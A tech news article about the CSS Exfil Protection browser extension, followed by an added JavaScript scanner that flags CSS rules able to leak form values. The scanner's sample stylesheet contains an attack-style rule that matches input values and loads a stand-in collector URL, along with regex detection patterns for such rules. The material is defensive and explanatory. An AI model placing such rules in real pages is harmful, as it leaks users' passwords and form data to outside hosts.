Protect yourself against a pure CSS data stealing attack called Exfil

CSS Exfil Protection is a browser extension for Mozilla Firefox and Google Chrome that protects data against CSS Exfil attacks.

An attack named CSS Exfil (from exfiltrate) uses CSS to steal data. Mike Gualtieri, the researcher who discovered the vulnerability, published several proof-of-concept attacks designed to steal usernames, passwords, and other data from the web pages they are used on.

Mike Gualtieri created a vulnerability tester that reports whether the web browser is vulnerable to CSS Exfil attacks. Visit the tester page to see whether the browser is vulnerable. The page only tests for the vulnerability and does not abuse it in any way.

CSS Exfil Protection is a browser extension that adds protections against CSS Exfil attacks to web browsers. Designed for Firefox and Chrome, the extension should work in Firefox-based or Chrome-based web browsers such as Opera or Vivaldi as well.

The extension "sanitizes and blocks any CSS rules which may be designed to steal data". Note that you may run into issues on sites that use these rules for legitimate purposes. The developer plans to introduce support for a whitelist in future versions to address the issue. An option to toggle it on or off globally is provided already.

Just install the extension in a supported web browser to protect your data against attacks exploiting the issue. You may want to visit the vulnerability tester page again to see if you are indeed protected.

CSS Exfil Protection adds an icon to the browser's main toolbar. The icon shows the number of blocked CSS rules to indicate that content was blocked on the page; this does not necessarily mean that the page was used in an attack as the CSS rules may be used for legitimate purposes as well.
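The blocked-rule count and its false positives can be illustrated with a small scanner. This is an added example, not the extension's own code: it assumes the rules of interest are those that pair an attribute selector matching an element's value with a remote `url()` load, and the function names, sample stylesheet and hostnames are constructed for illustration.

```javascript
// Added example: heuristic scan of a stylesheet, not the extension's code.
// Assumption: a rule is suspicious when its selector matches on the content
// of a value attribute AND its declarations load a remote resource.

// Attribute selector that tests the value attribute (=, ^=, $=, *=, ~=, |=).
const VALUE_MATCH = /\[\s*value\s*[\^$*~|]?=\s*[^\]]*\]/i;
// url() pointing at a remote origin (http, https, or protocol-relative).
const REMOTE_URL = /url\(\s*['"]?\s*(?:https?:)?\/\//i;

// Split a stylesheet into { selector, body } pairs. Handles flat rules only;
// comments are stripped first, nested at-rules are out of scope here.
function parseRules(cssText) {
  const rules = [];
  const noComments = cssText.replace(/\/\*[\s\S]*?\*\//g, "");
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = ruleRe.exec(noComments)) !== null) {
    rules.push({ selector: m[1].trim(), body: m[2].trim() });
  }
  return rules;
}

// Return the rules a blocker would neutralize, plus the toolbar-style count.
function scanStylesheet(cssText) {
  const flagged = parseRules(cssText).filter(
    (r) => VALUE_MATCH.test(r.selector) && REMOTE_URL.test(r.body)
  );
  return { blockedCount: flagged.length, flagged };
}

// Constructed sample stylesheet (hostnames are placeholders).
const SAMPLE_CSS = `
  /* ordinary styling: no value match, or only local resources */
  input[type="text"] { border: 1px solid #ccc; }
  a[href^="http"] { background: url(/img/external.png) no-repeat; }
  /* value match + remote load: the pattern the heuristic targets */
  input[value^="a"] { background-image: url("https://collector.example/a"); }
  /* legitimate flag icon from a CDN: same shape, so it is counted too */
  option[value="de"] { background: url(//cdn.example/flags/de.png); }
`;

const result = scanStylesheet(SAMPLE_CSS);
console.log(result.blockedCount, result.flagged.map((r) => r.selector));
```

The last sample rule is a harmless flag icon, yet it is counted, which is why a non-zero count on the toolbar icon is not evidence of an attack.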

CSS Exfil Protection is open source. You can browse the code on the project's GitHub page.

Closing Words

The CSS Exfil vulnerability highlights once again that there is always a chance that new technology supported by browsers can be abused.

Summary

Software Name

CSS Exfil Protection

Software Category

Browser

Landing Page

https://github.com/mlgualtieri/CSS-Exfil-Protection
